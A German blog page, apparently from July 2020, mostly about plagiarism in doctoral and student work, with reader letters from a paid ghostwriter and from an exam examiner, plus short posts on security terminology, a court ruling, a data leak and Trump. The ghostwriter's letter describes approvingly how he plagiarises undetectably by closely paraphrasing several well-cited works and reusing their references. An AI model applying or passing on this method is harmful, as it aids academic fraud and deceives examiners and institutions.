Ich persönlich würde einfach vorschlagen, den Doktortitel ganz abzuschaffen. Es ist völlig klar, daß er innerhalb der wissenschaftlichen Gemeinde nicht mit wissenschaftlicher Reputation assoziiert wird. Das liegt nicht nur an den vielen unsauberen Arbeiten, sondern einfach auch daran, daß er in vielen Fächern vor allem Folge von Fleiß und oft auch von strategischer Unterwerfung gegenüber einflussreichen Personen ist, nicht so sehr von wissenschaftlicher Brillianz.
Seine Bedeutung liegt m.E. vor allem in der Demonstration von Wissenschaftlichkeit in außerwissenschaftlichen Kreisen. ( Politik, mediale Öffentlichkeit, Nachbarschaft) . Wer sich mit seinem Doktortitel ansprechen läßt, ist eigentlich nur ein Angeber.
[l] Gestern meinte ich so: Fehlt nur noch der Leserbrief eines Ghostwriters zur Plagiate-Affäre. Ein Leser sah das und meinte "hold my beer" und hier ist sein Leserbrief:
Das Thema Ghostwriting wurde ja innerhalb der Plagiatsdiskussion angerissen. Darauf komme ich noch. Erstmal aus sozusagen "öffentlichem" Interesse Etliches zum Ghostwriting bzw. zu dem Geschäft an sich.
Wie wird man Ghostwriter?
Kann ich natürlich nicht pauschal sagen. In meinem Fall ist mir aus unglücklichen Umständen meine versprochene Promotionsstelle abhanden gekommen (Stipendium für eine andere bekam ich nicht) und ich fand mich mit einem exzellenten Masterabschluss einer Topuni/Fakultät (aber in Politikwissenschaften) auf dem Arbeitsmarkt wieder. Da meine Partnerin und ich zwei Kinder während meines Studiums bekamen, war auch Nichts mit tausend Sprachen lernen oder Praktika machen - also war der Jobmarkt entsprechend begrenzt. Meine Partnerin kam durch irgendeinen Artikel aufs Ghostwriting, ich rief nach einer kurzen Suche bei einer der einschlägigen Agenturen an und schwubs - fertig war die Laube.
Und da wären wir auch schon beim ersten Punkt - Das Ghostwriting-Business:
Dein einer Leserbrief sprach ja an, dass ein Freund sich das Studium mit kleinen Nebentätigkeiten finanzierte. Kein professioneller Ghostwriter arbeitet nur privat bzw. kenne ich niemanden, der das ernsthaft in Erwägung zieht. Es gibt zig Agenturen (manche schlechter, manche besser) die Autoren suchen. Man verdient privat zwar etwas besser (wenn man seinen Wert kennt), aber man muss sich direkt mit den Kunden rumärgern (zu diesen später).
Die Agenturen machen mehr oder weniger formlose Autorenverträge und dann kannst du für die schreiben. Da steht sowas drin wie - Steuern machst du selbst, Verschwiegenheitserklärung - und natürlich - Rechte an den Texten gibst du an die Agentur ab. Die Konstruktion ist also denkbar einfach. Ich führe mal stichwortartig weiter:
- Die Agentur akquiriert Kunden (für Alles was man sich vorstellen kann)
- Jede Agentur hat einen Fundus an Autoren und schreibt Aufträge, in der Regel über Mail, an die aus (es gibt Kategorien, in die man sich thematisch eintragen kann)
- Darauf bewirbt sich der Autor - den Auftrag bekommt er binnen 24 Stunden (oder halt Absage) - und tritt dann mit dem Kunden in Kontakt. Das erfolgt per Mail oder bei guten Agenturen über ein einigermaßen vernünftig verschlüsseltes System
- der produzierte Text wird vom Autor, wie vertraglich geregelt, an die Agentur verkauft und an den Kunden weitergegeben (auch die Rechte natürlich). Der Autor ist damit rechtlich nicht angreifbar und die Agentur, zumindest meines Wissens nach, auch nicht
- der Kunde ist der Einzige, der sich strafbar macht, da er ja häufig eine eidesstattliche Versicherung für "seine" Arbeit abgibt.
Nun zu den Agenturen selbst:
Die verdienen sich dumm und dämlich. Meine Stammagentur (ich arbeite am liebsten für die und es war zufällig auch mein Erstkontakt) ist einer der Luxusklassewagen in dem Business. Gute Autoren, vernünftiges Kommununikationssystem, einigermaßen fähige Mitarbeiter, ein in der Regel gutes Lektorat (ja, die Arbeiten werden zusätzlich noch lektoriert) und entsprechende Preise.
Für eine Pille Palle geisteswissenschaftliche Laberarbeit bezahlt der geneigte Masterabsolvent für 50 Seiten zwischen 4000 und 5000 Euro (hängt auch am Verhandlungsgeschick des Mitarbeiters und natürlich dem Bearbeitungszeitraum). Aufpreis durch bestimmte methodische Vorgehensweise (also konkrete empirische Forschung) oder irgendwelche sonstigen Zusatzleistungen. Der Autor erhält davon zwischen 30 und 40 Prozent! Dass man damit immer noch, zumindest in meinem Fall, gut bezahlt ist, wird noch erläutert. Meine Stammagentur schreibt irgendwas zwischen 10 und 12k Aufträge im Kalenderjahr aus. Genau weiß ich das nicht und es ist nur ne Hochrechnung aus verschiedenen Parametern. Was das letztlich an Umsatz ist, hängt natürlich stark von der Art der Aufträge ab. Man kann aber konservativ schätzen, dass der Umsatz im hohen einstelligen oder gar knapp zweistelligen Millionenbereich liegt. Den Großteil davon steckt sich der Gründer ein, der am operativen Geschäft aber selbstverständlich nicht beteiligt ist.
Die Agenturen sitzen häufig im Ausland (gerne, wer hätte es gedacht, in der Schweiz), da dies für in Deutschland ansässige Autoren, wegen nicht zu zahlender Umsatzsteuer auf das Honorar, attraktiver ist. Es gibt aber auch etliche Agenturen mit Sitz in Deutschland. Die haben manchmal sehr verworrene Finanzstrukturen, die ich im Einzelnen jetzt nicht diskutieren kann. In jedem Fall machen sie das "gut", was sie da machen :-)
Wer sind die Kunden?
Hier gibt es Erwartbares und eher Überraschendes. Man kann die Kunden, nach meinem Dafürhalten, in drei Kategorien unterteilen:
1. Zu doof/faul und gleichzeitig genug finanzielle Ressourcen (Eltern?)
2. Bereits seit einiger Zeit berufstätig und aus verschiedenen Gründen nochmal mit einem (Fern)Studium (häufig durch Arbeitgeber ist zu vermuten) im Unibetrieb.
3. Misc - hierunter fallen Krankheiten, sehr große Unsicherheit, "ich muss unbedingt eine gute Note erhalten" und keine Ahnung was noch - dies sind häufig Erstkunden und in vielen Fällen auch einmalige Auftraggeber.
Zu Kategorie 1 ist nichts hinzuzufügen.
Für Kategorie 2 habe ich persönlich vollstes Verständnis. Hier erlebe ich häufig, dass die einfach vollkommen überlastet sind und das nur aus dem Weg haben wollen. Nicht selten sind die absolut in der Lage das selbst zu machen. Zudem besitzen sie ja in der Regel auch genug finanzielle Mittel.
Kategorie 3 ist mit am Schwierigsten. Da frage ich mich häufig, warum die es nicht selbst schreiben und mir auf den Sack gehen mit ihren ständigen Forderungen nach "das will ich aber anders haben" :D
Die thematische Verteilung ist erwartbar. Alles was mit Wirtschaft (BWL, Marketing, Finance, also der ganze Bullshit halt) zu tun hat, ist überproportional vertreten. Die "echten" Wirtschaftswissenschaften oder VWL etc. kommen eher selten vor. Ansonsten gibt es thematisch Alles, allerdings besitze ich ja auch nur einen gewissen thematischen Auschnitt (s. o. Kategorien in die man sich eintragen kann). Dabei schreibe ich aber auch teilweise sehr weit ab von meinem eigenen Fachgebiet.
Auftragsarten:
Wie gesagt Alles, was man sich vorstellen kann. Von einer Seite Textexzerpt zu Doktorarbeiten. Inzwischen auch Open-Book Klausuren für unglaubliche 1000 Euro (wohlgemerkt Autorenhonorar) für 90min (vor allem im Ingenieur- oder naturwissenschaftlichen Bereich). Es gibt auch Coachings, Fachlektorate und Windeln wechseln :D
Jetzt mal zu meiner Tätigkeit/Arbeitsweise/Verdienst:
Ich muss vorab mal kurz arrogant sein und mich als einen der Topleute in dem Business bezeichnen. Sprich der gesamte Text ist aus der Warte eines Autoren geschrieben, der keine Probleme hat Aufträge zu bekommen und grundsätzlich weiß was er kann, tut, aber eben auch, was er nicht kann.
Da ich häufiger mal schiefgegangene Aufträge reparieren muss, habe ich zumindest einen gewissen Eindruck von anderen Autoren. Ich kenne keine Zahlen, aber manche Kunden greifen komplett ins Klo :D
Arbeitsweise und damit auch zur Plagiatsdiskussion:
Als ich vor etlichen Jahren angefangen habe, bin ich wie ein klassischer (sehr guter) Student an die Aufträge rangegangen. Ich habe Quellen gewälzt, Exzerpte gemacht und den Fließtext häufig mehrmals in Teilen überarbeitet. Damit verdient man zwar Geld, aber der Stundenlohn ist nicht gerade sehr hoch.
Heute schreibe ich, je nach Thema, Niveau und Formatierung der Arbeit, etwa 2 bis 3 Seiten pro Stunde. Und die sind dann komplett - wissenschaftlich mehr oder weniger einwandfrei, gut formuliert und im Prinzip abgabefertig. Man kann sich ausrechnen (25 bis 30 Euro pro Seite), was ich verdienen könnte, wenn ich das Vollzeit machen würde. Ich aber arbeite im Schnitt etwa 3 bis 4 Stunden. In Ausnahmefällen schreibe ich natürlich auch mal 15 Seiten am Stück, aber danach bin zumindest ich fix und alle. Die Arbeit ist mit nichts vergleichbar, was ich vorher beruflich mal gemacht habe (war vor dem Studium berufstätig). Du bist permanent auf Sendung und hast keine downtime - anstrengend as fuck. Und mir reicht das Geld zum Leben :-)
Wie schaffe ich dieses Pensum an Seiten ohne Vorarbeit?
Ich plagiiere - aber eben "richtig". Das muss ich an einem Beispiel erläutern:
Stellen wir uns vor, ein Kunde möchte eine 20 seitige Seminararbeit auf Masterniveau zum Thema Corporate Social Responsibility (Fragestellung ist scheißegal). Dazu gibt es tausende Bücher, Paper etc. Ich suche mir dann Publikationen heraus, die einen Zitierstil haben der sehr genau ist - bevorzugt Dissertationen oder irgendwelche gut belegten Standardwerke. Es können aber auch kleinere Publikationen sein. Wichtig ist nur, dass die vernünftig zitieren.
Davon nehme ich dann, in Abhängigkeit der Anforderung natürlich, einige Werke und fange an inhaltlich aus denen direkt den Fließtext zu schreiben und ihre Quellen zu benutzen. Ich paraphrasiere also, aber eben sehr sehr sehr gut. Und ich mache das nicht nur aus einer, sondern eben aus mehreren Werken, die jeweils auch andere Schwerpunkte setzen und eben andere Quellen benutzen. Dazu kommt, dass ich dies kritisch mache. Man glaubt gar nicht, wie viele (leichte) Zitierfehler man in praktisch allen Publikationen findet. Ich gucke mir dann die verwendete Quelle an (ich habe einen sehr umfassenden Literaturzugang), schreibe aus der zusätzlich Informationen "ab" oder zitiere auch direkt aus ihr. Dieser Prozess ist je nach Thematik, Niveau etc. natürlich mal einfacher und mal schwerer, aber es gibt im Grunde keine Themen, die nicht so bearbeitbar sind. Natürlich trifft das nicht auf Teile der Arbeit zu, die ggf. empirisch sind o. Ä.
Das heißt: Meine Arbeiten sind allesamt Plagiate, da ich die inhaltlichen Gedanken und Strukturen anderer Arbeiten einfach übernehme (die für die inhaltliche Struktur/Gedanken verwendeten Arbeiten zitiere ich natürlich dann nicht). Aber wie mir auch der eine Leserbrief zeigte, haben Verantwortliche an der Uni überhaupt keine Chance dagegen, wenn sie überhaupt wissen, dass so der eigentliche professionelle Plagiatsvorgang abläuft. Ich weiß nicht, ob andere Autoren auch so arbeiten, aber ich gehe stark davon aus, dass es ein relativ großer Anteil von den "guten" Autoren tut.
Natürlich haben die Unis überhaupt keine Kapazitäten dies auch nur annähernd irgendwie zu überprüfen. Zudem ist es nahezu unmöglich auch bei starken Verdachtsmomenten dies nachzuweisen. Ich weiß, wie ich das machen würde und bin mir ziemlich sicher, dass ich einen gewissen Anteil an solchen Arbeiten identifizieren könnte, aber rechtlich wasserdicht wäre das niemals.
Wenn wir also bei Plagiaten von einem gewissen Dunkelfeld sprechen, dann ist das potentiell riesig und vor allem viel größer, als Verantwortliche sich das vermutlich ausmalen. Denn ich gehe davon aus, dass ich nicht einer von wenigen klugen Menschen bin, die auf die Idee kommen so zu arbeiten.
Abschließende Gedanken zu meinem Tätigkeitsfeld:
Ich prostituiere mich. Da mache ich mir überhaupt keine falschen Vorstellungen.
Fühle ich mich dabei schlecht?
Das kann ich nicht so genau beantworten. Mich regt manchmal auf, dass ich Leuten potentiell Jobs verschaffe, die ich niemals bekommen hätte oder auch werde, aber das ist ein sehr egoistischer Gedankengang.
Ich verstehe mich als Dienstleister für Menschen, die diese Leistung eben brauchen. Ob ich damit der Gesellschaft einen reellen Schaden zufüge? Ich glaube da kann man einige Abhandlungen drüber schreiben. Ich mache vermutlich das, was ich am besten kann und man kann sogar argumentieren, dass ich volkswirtschaftlichen Mehrwert schaffe, indem ich einer Vielzahl von Menschen sehr wahrscheinlich das lebenslange Durchschnittseinkommen um einen bestimmten Prozentsatz erhöhe (wie klein der auch immer sein mag).
Ich liebe meine Arbeit inzwischen, da sie mir unglaublich viele Freiheiten lässt, ich gut verdiene und vor allem - ich lerne permanent. Ich bin ein Wissensfetischist und ich werde zu einem Universalgelehrten im besten humanistischen Sinne.
Mir tun die Unis nicht leid. Mir tun auch die Akademiker nicht leid. Ich kenne den Wissenschaftsbetrieb gut genug und wenn wir schon so viel Schund in diesem produzieren, dann nehme ich mir die Freiheit davon zu profitieren. Mein Idealismus ist schon seit sehr langer Zeit tot.

Wed Jul 8 2020

[l] Mit den Plagiaten habe ich offenbar in ein Wespennest gestochen. Hier ist noch ein langer Leserbrief dazu:
Vroniplag zeigt ein Problem, das in der Wissenschaft absolut verbreitet ist.
Die sind nur die Spitze des Eisberges.
Die Universität ist eine Hochburg des Betrugs. Und der Unfähigkeit. Die Übergänge sind fließend.
Ich sitze in einem Prüfungsausschuss eines Master-Studiengangs und bin ansonsten regelmäßig Prüfer in der Studieneingangsphase. Natürlich mache ich auch Klausuraufsichten (ich sitze gerade in einer und schaue Studis beim Schreiben zu).
In dem (bezahlten!!) Masterstudiengang exmatrikulieren wir eigentlich in jedem Semester zwei oder drei Leute, wobei der Studiengang nicht gerade groß ist.
Ich habe keine Zahlen, schätze aber, dass es vielleicht fünfzig Plätze im Jahr gibt.
In der Studieneingangsphase korrigiere ich in jedem Semester mindestens 20 Hausarbeiten (also Prüfungsleistungen, nicht irgendwelche Einreichungen unter dem Semester), ich lege in der Regel mindestens einen, häufig zwei oder drei Fälle dem Prüfungsausschuss zur Entscheidung über das Vorliegen eines Plagiates vor.
Bei den Klausuren ziehe ich pro Klausur mindestens (nein, keine Untertreibung, bei der letzten Klausur waren es drei oder vier) eine Person raus. Die letzte Klausur, bei der es drei oder vier waren, hatte corona-bedingt in meinem Hörsaal vielleicht dreißig oder vierzig Teilnehmende.
Mit anderen Worten: Mein Hellfeld(!) zeigt eine Betrugsrate von durchgängig etwa 10% im Studium, ungeachtet der Phase. Das Dunkelfeld dürfte erheblich größer sein.
Wir schreiben die Klausuren trotz Corona gerade in Präsenz; die umfassenden Hygienemaßnahmen erspare ich Dir. Aber: Wir hatten schon Verdachtsfälle, bei denen wir vermuteten, dass Spickzettel unter dem Mund-Nasen-Schutz versteckt waren, der bis zum Arbeitsplatz zu tragen ist.
Es gibt grob zwei Gruppen an Plagiatsfällen: Die von dummen Leuten, die wir relativ verlässlich rausfiltern. Das sind die, die auch nach mehrfacher Belehrung nicht verstehen, dass sie erstens ohnehin nichts aus der Wikipedia übernehmen sollen, weil die nicht unseren wissenschaftlichen Standards genügt, und zweitens dass sie, wenn sie es doch tun, wenigstens Anführungszeichen drumrum setzen und nen Link dranschreiben sollen.
Ungelogen. Der letzte Fall in dem angesprochenen Master(!) war ein Fall, wo der/die Betroffene zum vierten oder fünften Mal(!!) großflächig aus der Wikipedia kopiert hat. Ungeachtet dessen, dass er damit seine "wissenschaftliche" Arbeit maßgeblich auf einen Wikipedia-Nutzer gegründet hat, über den nicht viel mehr bekannt war, als dass sein Nutzername übersetzt "Mikrowellenofen" bedeutete und dass er vermutlich aus Nordeuropa kam (die Nutzerseite war wirklich dürftig), war das halt ein Plagiat. Er/sie ist dann endlich geflogen. Aber das ist so das eine Ende der Skala und überhaupt nicht selten.
Die meisten Fälle sind dann formale Sorgfaltsverstöße, in den unteren Semestern von der Kategorie "Fußnote gesetzt, aber Anführungszeichen fehlen" oder so. Das ist auch nicht schön, weil es für alle Beteiligten Ärger macht, aber da belassen wir es in der Regel bei einer Verwarnung. Auch, wenn zumindest ich damals in der Schule gelernt habe, wie sowas funktioniert und es doch sehr bedauerlich ist, dass man grundlegendes Wissen über richtiges Zitieren nicht voraussetzen kann. so schwer ist das aber nicht.
Die richtig harten Nüsse sind dann so Aktionen wie "von der tschechischen Seite der EU-Kommission kopiert und über Englisch durch Google Translate gejagt und auf Deutsch eingereicht". Da braucht man dann ein wenig detektivisches Gespür und da geht es dann schon sehr deutlich in Richtung vorsätzlicher Täuschung. Sowas fällt dann vor allem auf, wenn Studis den Fehler machen, dass es zu perfekt wird. Man kriegt irgendwann ein Gespür dafür, wo man genau hingucken muss. Aber letztlich ist man auch da darauf angewiesen, dass man die verdächtigen Stellen erkennt und dann auch noch die Quellen findet.
Insofern: Das Dunkelfeld dürfte sicher nochmal so groß, wenn nicht größer sein, als das Hellfeld.
Und da habe ich dann die Ghostwriter noch gar nicht angesprochen. Das ist auch, ich sage mal: üblich. Ein Studienfreund hat sich so sein Studium finanziert, dass er Leuten bei ihren Hausarbeiten geholfen hat. Er war (jedenfalls hat er das mir gegenüber immer behauptet) wenigstens so anständig, dass er nur Gliederungen durchgesprochen oder Textpassagen redigiert hat, aber keine eigenen Textvorschläge gemacht hat. Es gibt aber auch die, die gegen Geld die Hausarbeiten anderer Leute schreiben. Gerüchteweise soll es sowas z.T. auch bei Klausuren geben.
Die Ghostwriter werben mit Aufklebern an den Laternen rund um die Uni-Gebäude herum.
Wenn der Ghostwriter handwerklich sauber arbeitet und keine Fehler macht (das ist das nächste, es gibt Anekdoten von Studis, die sich ganz empört beschwert haben sollen, dass die Arbeit soviel Geld gekostet habe, die dürfe jetzt nicht so schlecht benotet werden), dann haben wir leider wenig Chancen, das nachzuweisen.
Es gibt sogar Studien dazu; die SZ hat über eine berichtet in der ein Drittel angab, bei universitären Prüfungsleistungen beschissen zu haben.
Warum schreibe ich das alles? Weil ich mit jedem Fall, der auf meinen Tisch kommt, ärgerlicher werde. Denn ich weiß, dass ganz viele Leute mit so einer Scheiße durchkommen und ich für meine Ehrlichkeit und Sorgfalt auch noch bestraft werde, weil ich, wenn ich umfangreiche Fußnotenapparate zu Fuß in Word aufbereite (weil die Journals in meiner Disziplin LaTeX leider für ein falsch geschriebenes Gummiprodukt halten) nämlich auch Lesen oder, noch besser, schreiben können. In einem Umfeld, in dem gerade Publikationen (und da vor allem Anzahl und ggf. Journal/Verlag) die Währung sind, ist das frustrierend.
Ich komme nicht umhin, bei jedem dieser Plagiatsfälle eine gewisse Befriedigung zu verspüren, dass es einen von denen wieder rausgezogen hat.
Eine Art späte Rache, sozusagen.
Während ich bei den Studis noch sagen kann, dass sie sich selbst schaden, weil sie spätestens im Examen ganz alleine da sitzen und ihre Fälle selbst lösen müssen, zählt dieses Argument aber gerade bei Doktorarbeiten nicht. Denn wer plagiiert und damit durchkommt (und das passiert eigentlich immer, entweder weil es früh bemerkt und dann "glatt gezogen" wird oder aber, weil es nicht bemerkt wird und dann der Titel da ist), schadet sich selbst kaum. Man wird ja besser bezahlt, hat bessere Berufschancen, höheres Ansehen.
Und wenn es doch passiert, dann greift der Mechanismus, den Du in Deinem Eintrag ja auch ganz wunderbar beschreibst: Für die Einzelperson hat man es ja eh gewussst, aber der ganze Rest ist dann ja auch nicht besser.
Ich kann so ehrlich und so sorgfältig sein, wie ich will, die Guttenbergs sorgen dafür, dass die Arbeit, die ich mir mache, letztlich für die Katz ist. Völlig unabhängig davon, ob ich vielleicht wirklich ein cooles Problem gefunden und vertieft daran rumgedacht habe. Weil das ja Otto-Normal-Verbraucher ohnehin nicht begreift, weil viel zu komplex für jemanden, der nicht mindestens ein paar Grundkurse besucht hat.
Da ist es dann viel einfacher, die Leistung pauschal abzuwerten.
Und genau aus diesem Grund kann ich solche "Online-Pranger" nur schwer verwerflich finden. Wer sich in Gefahr begibt, kommt darin um. Niemand muss betrügen.
Es heißt nicht umsonst Doktor"würde". Ein Doktorgrad ist eine akademische Ehre, ein Privileg. Er soll zeigen, dass man in der Lage ist, eigenständig wissenschaftlich zu arbeiten. Wer ihn trägt, repräsentiert Wissenschaft, also die organisierte Suche nach einer Wahrheit. Mit den entsprechenden Tugenden, nämlich Wahrheitsliebe und Fehlerbewusstsein, Kritikfähigkeit. es ist eine der höchsten Errungenschaft der aufgeklärten Wissenschaft, dass sie das Zugeben von Fehlern ("Da habe ich mich wohl geirrt, fang' ich wohl nochmal von vorn an.") zur Tugend gemacht hat, anstelle an Dogmen festzuhalten.
Wer eine Doktorarbeit veröffentlicht und den Doktorgrad führt, der nimmt diese Werte öffentlich und offensiv für sich in Anspruch. Beim Aussprechen des Namens(!) verlangt eine solche Person, dass ihr diese Eigenschaften immer wieder zugesprochen werden.
"Seht her! Ich bin Wissenschaftler! Alle sollen es wissen!"
Wenn das nur auf Lüge beruht, dann sollen auch das mit der Lüge alle wissen. Wer eine plagiierte Doktorarbeit abgibt, der begibt sich selbst in die Gefahr, dass das Plagiat irgendwann aufgedeckt wird. Wie heißt es? Wer sich in Gefahr begibt, kommt darin um.
Mit solchen Gestalten habe ich kein Mitleid.
Ganz im Gegenteil.
[l] Meine Damen und Herren, ab und zu schickt mir jemand eine Meldung zu, die mich in Bedrängnis bringt.
Heute war es mal wieder so weit. Und zwar gibt es ja so ein Wiki, wo Aktivisten in anderer Leute Doktorarbeiten nach Plagiaten suchen. Entstanden ist das im Umfeld des Guttenberg-Skandals, aber es ging um andere Leute, der Guttenberg hatte ein eigenes Wiki damals.
Aus meiner Sicht ist das ein Internetpranger. Ja, mag sein, dass das inhaltlich ein Dienst an der Gesellschaft ist, und dass es skandalös ist, wie viele Plagiate es gibt, und dass die Leute damit durchkommen.
Ich habe allerdings nie viel auf Doktorarbeiten gegeben. Ich hatte da nie die Erwartungshaltung, dass das nicht plagiiert ist.
Aus meiner Sicht ist das wie mit anderen Bildungsstandards auch. Früher haben nicht mal 10% der Schüler Abitur gemacht. Da war das eine besondere Leistung. Heute haben um die 50% der Schüler entweder die Allgemeine Hochschulreife oder die Fachhochschulreife. Das ist doch klar, dass die dann nicht alle Gold abliefern werden.
Wenn du im Wesentlichen von allen Medizinern und Juristen eine Doktorarbeit verlangst, dann wird da auch viel Mist drunter sein.
Und in meinem eigenen Fach Informatik war das jedenfalls zu meiner Zeit sogar ein Konterindikator. Wenn jemand eine Doktorarbeit geschrieben hat, dann heißt das, dass ihn in der Mitte der Dot-Com-Blase keiner aus der Wirtschaft haben wollte. Die Goldgräberstimmung in der Industrie hat seit dem etwas abgenommen, aber das kommt immer in Wellen wieder. Wenn also jemand einen Doktor in der Informatik machte, dann war das ein schlechtes Zeichen, kein gutes. Da hätte man auch keine Erwartungen an die Qualität der Doktorarbeit gehabt.
Gut, kommen wir zurück zur Einsendung von heute. Dieses Wiki hat sich eine Doktorarbeit angeschaut, und auf 90% der Seiten Plagiate gefunden. Money Quote aus dem Artikel:
Das ist ein sehr hoher Wert, der sich in Dimensionen eines Karl-Theodor zu Guttenberg bewegt.
Interessiert mich immer noch nicht an der Stelle.
So und jetzt kommt der Grund, wieso mir der Einsender das geschickt hat:
Sie gilt als Expertin für Kryptoökonomie und schrieb als Promovierte eine Broschüre über „Blockchains, Smart Contracts und das Dezentrale Web“.
Blockchain? Da hat sich der Einsender gedacht: Das schicke ich mal dem Fefe.
Wie jeder Mensch habe ich Confirmation Bias und freue mich über Meldungen, die meine Vorurteilte bekräftigen. Aber das reicht nicht.
So eine Doktorarbeit hat immer Personenbezug. Insofern bleibt das auch immer Internetpranger, egal wie korrekt die Anschuldigungen sind.
Insofern sage ich hier mal direkt für die Zukunft an: Solche Meldungen werden bei mir nicht verlinkt. Schickt sie mir ruhig trotzdem, und ich nutze das dann für meine persönliche Schadenfreude, aber ins Blog kommt sowas nicht. Ausnahmen würde ich höchstens für Politiker machen, die ein wichtiges Amt bekleiden oder für ein wichtiges Amt im Gespräch sind. Beides ist hier nicht der Fall.

Mon Jul 6 2020

[l] Na das hat ja gerade noch gefehlt: Der Security-Chef von Android findet, Black Hat und White hat seien rassistische Begriffe und GEHÖREN AUSGEMERZT.
Wir haben ja in der IT schon seit einer Weile eine Kulturrevolution laufen, wo selbsternannte Moralinstanzen herumlaufen und anderen Leuten Vorhaltungen machen, wie sie in ihren Projekten Dinge zu benennen haben. Und wie bei der chinesischen Kulturrevolution drängt sich von außen ein bisschen der Eindruck auf, es ginge gar nicht um die Bekämpfung von Faschismus sondern um das Erbringen des Beweises, dass man selbst der beste Kommunist von allen ist.
Den traurigen Höhepunkt hat das kürzlich erreicht, als Rich Salz bei OpenSSL vorstellig wurde, damit die bei sich "Master Key" und ähnliche Terminologie exterminieren. Rich Salz ist bekannt dafür, dass er INN geschrieben hat, in den 1990er Jahren einer der wichtigsten Usenet-Newsserver. Rich arbeitet bei Akamai in der Security-Abteilung und in seiner Funktion als Akamai (Großkunde von OpenSSL) hat er dann bei denen genug Druck gemacht, um eine Abstimmung auszulösen. Die ging dann aber mit 4:3 Stimmen gegen die Kulturrevolution aus, woraufhin Rich Salz öffentlich ein Rumpelstilzchen pullte und was von "on the wrong side of history" brüllte, seinen Weggang von OpenSSL verkündete und sich vor Zorn in der Luft zerriss.
Und jetzt? Jetzt kommen die Einschläge näher. Jetzt geht es um White Hat und Black Hat. Das hat natürlich mit Rassismus nichts zu tun, denn das ist eine Anspielung auf die alten Schwarzweiß-Western. Da musste man dem Zuschauer einen Weg geben, den Bösewicht und den Helden auseinanderzuhalten. Der Weg war, dass man dem Guten einen hellen Hut gab, dem anderen einen dunklen. Mehr als hell-dunkel ging eh nicht bei dem Medium.
Weder White Hat noch Black Hat sind jetzt inhaltlich Fachbegriffe. Ich fand die noch nie gut. Das war schon von Anfang an Virtue Signaling. Ich bin kein böser Hacker, ich bin ein guter Hacker! Seht her, ich habe einen weißen Hut! Ein blöder Witz, der auf blöden Hollywood-Stereotypen aus den 50er Jahren basierte. Der unsicheren Software ist es auch egal, mit welcher Intention sie gehackt wird.
Mich ärgert bloß die Hybris, mit der Leute wie Rich Salz anderen Vorhaltungen machen. Und das ganz ohne vorweisbare Wirkung! Was waren denn die großen Errungenschaften der Schwarzen in den USA? Das formelle Ende der Sklaverei, Rosa Parks, Martin Luther King, Abschaffung von Jim Crow und Eintrittsverboten für Schwarze und von Schwarzen-Toiletten (gibt es im Pentagon übrigens noch, das ist älter als die Abschaffung). In jüngerer Zeit hat sich wohl die Taxi-Situation auch normalisiert. Welcher davon wurde von Sprachpolizei und Kulturrevolution befördert? KEINER!
Ich bin kein Freund der alten Terminologie, und ich bin kein Freund von OpenSSL. Aber Rich Salz hat gerade noch tiefer ins Klo gegriffen als die beiden zusammen.
"Was haben Sie eigentlich gemacht, als die Polizei George Floyd ermordet hat?"
"Ich habe ein paar wichtige Konstanten umbenannt!"
m(
Update: Wenn ihr gerade mal ne halbe Stunde Zeit habt, googelt doch mal Symbolbilder von bösen Hackern. Wenn ihr auch nur einen Schwarzen findet, dann habt ihr mehr als ich gefunden. Der Hoodie ist schwarz, die Maske ist schwarz, der Laptop ist schwarz, der Hacker ist weiß. Wenn hier also was rassistisch ist, dann in die andere Richtung. "Die Kriminellen sind alle Weiße!1!!"

Sat Jul 4 2020

[l] Mexiko (Bundesland Sonora) hat die Grenze zu Arizona zugemacht und lässt keine Amis mehr rein. Kanada hat ihre Grenze zu den USA auch zugemacht.
Jetzt müsste Mexiko nur noch eine Mauer bauen.

Thu Jul 2 2020

[l] Ich hatte ja in der "Filesharing-Oma"-Sache eine Mail an das Amtsgericht Köln geschrieben. Als da keine Antwort kam, hab ich nochmal nachgehakt. Jetzt kam eine Antwort. Die ursprüngliche Anfrage ist offenbar verlorengegangen. Egal, kann passieren.
Inhaltlich sagen sie, was schon zu erwarten war: Richter sind halt unabhängig und daher kommentiere man da auch nicht.
Gut, hatte ich erwartet. Daher hatte ich noch mehr gefragt, nämlich welche Formulierung im aktuellen Gesetzestext des Telemediengesetzes denn Schuld war, dass dieses Urteil so ergehen konnte, und wie man den formulieren müsste, damit in Zukunft gemacht wird, was (für Laien) im Urteil steht: Keine Inanspruchnahme von WLAN-Betreibern für Urheberrechtsverletzungen ihrer Gäste.
Ich würde da ja nicht so ein Fass aufmachen, wenn nicht die Abgeordneten so felsenfest überzeugt den Medien Vollzug gemeldet hätten, dass die Sache jetzt endgültig vom Tisch sei.
Mit der Prämisse, dass das Gesetz dann halt nicht gut formuliert war, kann ich ja leben. Aber dann sagt mir bitte, was man da ändern muss, und dann mach ich hier ne Kampagne und wir bringen die gewünschte Formulierung ins Gesetz.
Und ich stelle mir natürlich auch die Frage, welchen Wert unsere zelebrierte Gewaltenteilung hat, wenn die Abgeordneten nicht in der Lage sind, ein Gesetz so zu formulieren, dass die Richter verstehen, wie es gemeint war. Wenn die Bevölkerung nicht in der Lage ist, nach Lesen des Gesetzes abzuleiten, was erlaubt ist und was nicht, wie kann man dann erwarten, dass sich die Leute an die Gesetze halten? Das ist ja eine Sache, wenn das Gesetz so unklar geschrieben ist, dass man das nicht versteht. Es ist eine andere Sache, wenn das Gesetz glasklar und wasserdicht formuliert zu sein scheint aber dann in der Praxis gegenteilige Urteile ergehen. Das verstößt gegen mein Rechtsempfinden.

Wed Jul 1 2020

[l] Datenreichtum bei Foodora / Delivery Hero.
Da zeigt sich ein schöner Kontrast, finde ich. Wenn in deinem Restaurant Hygiene-Verletzungen gefunden werden, wird es zugemacht. Wenn du Kundendaten ins Internet bläst, dann zucken alle mit den Schultern. Softwareproblem. Hackerangriff. Wir sind ja bloß ein kleines Startup (*haarzwirbel* *rehaugen*), da hat ja wohl hoffentlich niemand was erwartet. Auswirkungen: Keine.
Warum eigentlich? Wo bleiben die DSGVO-Millionenstrafen?

Tue Jun 30 2020

[l] Trumps Telefon-Diplomatie ist ungefähr so kompetent, wie man sich das vorstellt.
Er wurde regelmäßig von einem fähigeren Gegenüber regelrecht vorgeführt, dass er dann seine gefühlt schwächeren Gegenüber wie ein kleiner tumber Schulhof-Bully beschimpft hat. Wenig überraschend waren es die Frauen, an denen er seinen Frust dann abgearbeitet hat, insbesondere Theresa May und Angela Merkel.
Naja, Learning by Doing, denkt ihr euch jetzt vielleicht. Übung macht den Meister!
The sources said there was little evidence that the President became more skillful or competent in his telephone conversations with most heads of state over time. Rather, he continued to believe that he could either charm, jawbone or bully almost any foreign leader into capitulating to his will
